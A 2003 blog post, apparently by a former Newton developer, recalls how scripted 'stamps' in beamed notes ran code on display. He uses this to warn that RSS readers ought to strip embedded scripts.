March 01, 2003
RSS virus?
A recent thread discusses possibly security issues with embedded scripts inside RSS items. Basically the idea is that an RSS item could have embedded scripting that attempted to wreak havoc.
This reminds me of a hack I wrote for the Newton.
Greg Christie and I were interested in writing a series of extensions to the Newton's Notepad that would allow you to 'stamp' live data elements into notes. This as a parallel to a less robust feature found on the then competing Magic Cap units. The desire was to have a notepad, calendar or name entry stamped with items from each other. You'd create a note, stamp it with someone's name and a calendar item and the note would contain live links.
This worked pretty well. We used a feature of the view system in an unexpected way. The view system supported an object having the ability to override default behaviors. We used this to capture when someone clicked on one of our stamps to transport them to the stamped item. Now, stay with me here because this is important. This worked great until you tried to send an item to someone else.
We then hacked the transport to allow it to 'flatten' these stamped items before sending them over to someone else. What we discovered, and this is the heinously evil part, is that the display system on the receiving end would dutifully execute our code the instant the user displayed the item. This would then 'dehydrate' the stored stamp and stuff the data out into live entries in the target machine. Worked like a charm.
I found an evil angle. I wrote a hack that would create a stamp that did searches. Upon receipt it would search the target machine and send back the results. Quite evil. I could send you a note that dug through your machine and gave me back whatever I'd asked of it. I never released this to the wild. But it did raise some questions about viruses and sandboxing. The Newton tanked long before this ever became an issue.
Where it became legend was during a MacWorld conference, SF I think. At the show I was exchanging electronic business cards with an Apple rep. The Newton let you do this via beaming infrared transfers. Just as we were about to do the transaction the rep stopped, put her hand over the IR port on her Newton and said "oh, wait a minute you're Bill Kearney. I heard not to let you send me notes." I had to chuckle; laughed out loud in fact. Here's where a very handy feature of the OS had ended up being used for nefarious purposes and thus harmed it's use for legitimate ones. Quite the parallel to scripting RSS in a mail client.
So I could say, been there, done that. RSS with extremely rare exception, does not need live scripting embedded in it. Reader programs should attempt to neuter anything that looks like a script AND tell the user about it.
Trust me on this one. Oh and here, let me send you a feed....
